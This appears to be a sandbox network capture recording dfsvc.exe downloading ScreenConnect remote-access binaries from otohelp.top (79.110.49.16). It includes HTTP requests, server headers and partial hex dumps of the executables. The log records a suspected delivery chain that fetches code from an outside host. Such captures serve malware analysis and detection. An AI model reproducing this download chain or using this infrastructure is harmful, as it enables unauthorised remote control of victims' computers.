2024-10-02 04:25:29 UTC	16384	IN	Data Raw: 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06 Data Ascii: rtMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49734	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:30 UTC	95	OUT	GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:25:30 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 68096 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:30 GMT Connection: close
2024-10-02 04:25:30 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
2024-10-02 04:25:30 UTC	16384	IN	Data Raw: 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00 Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,oe4g(V{To#o((J{Vo)(*(0C
2024-10-02 04:25:30 UTC	16384	IN	Data Raw: 27 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4 Data Ascii: '--.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
2024-10-02 04:25:30 UTC	16384	IN	Data Raw: 69 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e Data Ascii: ityActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionIn
2024-10-02 04:25:30 UTC	2776	IN	Data Raw: 00 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49736	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:31 UTC	89	OUT	GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:25:31 UTC	218	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 1721856 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:31 GMT Connection: close
2024-10-02 04:25:31 UTC	16166	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
2024-10-02 04:25:31 UTC	16384	IN	Data Raw: 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a 16 20 7c 4f 00 00 73 07 02 00 0a 28 6e 01 00 0a 2c 35 Data Ascii: ((,o4.s0(~^(rqp((0G%-&(%rp%rp(~%-&s%(2+0:( \|Os(n,5
2024-10-02 04:25:31 UTC	16384	IN	Data Raw: fc 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f Data Ascii: }}}{(}{(-{s{z2{0<{3{(NoO3}+sM{}(Sz(,}(NoO}*0{,;}%X
2024-10-02 04:25:31 UTC	16384	IN	Data Raw: 6e 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 80 97 c8 0a 26 56 80 5f 39 0a 26 56 80 60 bd 0a 26 56 Data Ascii: n"qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"\|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V&V_9&V`&V
2024-10-02 04:25:31 UTC	16384	IN	Data Raw: c6 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 00 e1 09 96 bc 4e 00 17 07 18 a8 00 00 00 00 e1 01 bd Data Ascii: ^S^'jr);z0;;'9;U9;X7=N
2024-10-02 04:25:31 UTC	16384	IN	Data Raw: 5b 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d 1c 0e 00 e0 00 c6 1c 08 00 f0 00 64 1d 08 00 f4 00 69 Data Ascii: [4E_9<J_FX9iXq7q6YA>)L\|1hS![9L\|95pj\|(Y;k=L[TID%*/ 49>Qbuzdi
2024-10-02 04:25:31 UTC	16384	IN	Data Raw: 3e 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 3e 62 5f 5f Data Ascii: >9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe\|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveConsoleSessionID>b__
2024-10-02 04:25:31 UTC	16384	IN	Data Raw: 62 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c Data Ascii: baseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHel
2024-10-02 04:25:31 UTC	16384	IN	Data Raw: 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e Data Ascii: p<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.
2024-10-02 04:25:31 UTC	16384	IN	Data Raw: 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49737	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:33 UTC	95	OUT	GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:25:33 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 601376 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:33 GMT Connection: close
2024-10-02 04:25:33 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
2024-10-02 04:25:33 UTC	16384	IN	Data Raw: 00 0a 2a 00 00 1b 30 06 00 ef 0d 00 00 2c 00 00 11 73 ab 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 25 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 36 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4a 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4a 06 00 06 13 08 11 04 7b 16 03 00 04 6f 15 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a Data Ascii: 0,s}(u,rp(v(w(x}H((((~%-&~%s%(3+o8$o}{(,+{o(6{o)(J{o(J{o(%o
2024-10-02 04:25:33 UTC	16384	IN	Data Raw: 02 7b 54 00 00 04 6f 0b 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 14 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f b8 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 14 03 00 0a 74 9a 00 00 01 17 6f 15 03 00 0a 26 02 7b 54 00 00 04 14 6f 7b 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0b 07 00 06 8c b6 00 00 02 a2 28 07 03 00 0a 02 7b 54 00 00 04 6f 0b 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0a 03 00 0a 6f 45 01 00 0a 2b Data Ascii: {To.{To0b{To,M{Z(o{To{T{Toto&{To{(<(<*0Grp%3%{To({To..'+5{Z(o-"(soE+
2024-10-02 04:25:34 UTC	16384	IN	Data Raw: 73 27 04 00 0a 28 b2 00 00 2b 28 b3 00 00 2b 6f 28 04 00 0a 2a c2 02 28 29 04 00 0a 02 7e 2a 04 00 0a 28 2b 04 00 0a 02 20 02 60 00 00 17 28 2c 04 00 0a 02 02 fe 06 dd 01 00 06 73 2d 04 00 0a 28 2e 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02 7b 9f 00 00 04 2a 22 02 03 7d 9f 00 00 04 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 1e 02 7b a3 00 00 04 2a 22 02 03 7d a3 00 00 04 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 Data Ascii: s'(+(+o(()~(+ `(,s-(.{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}
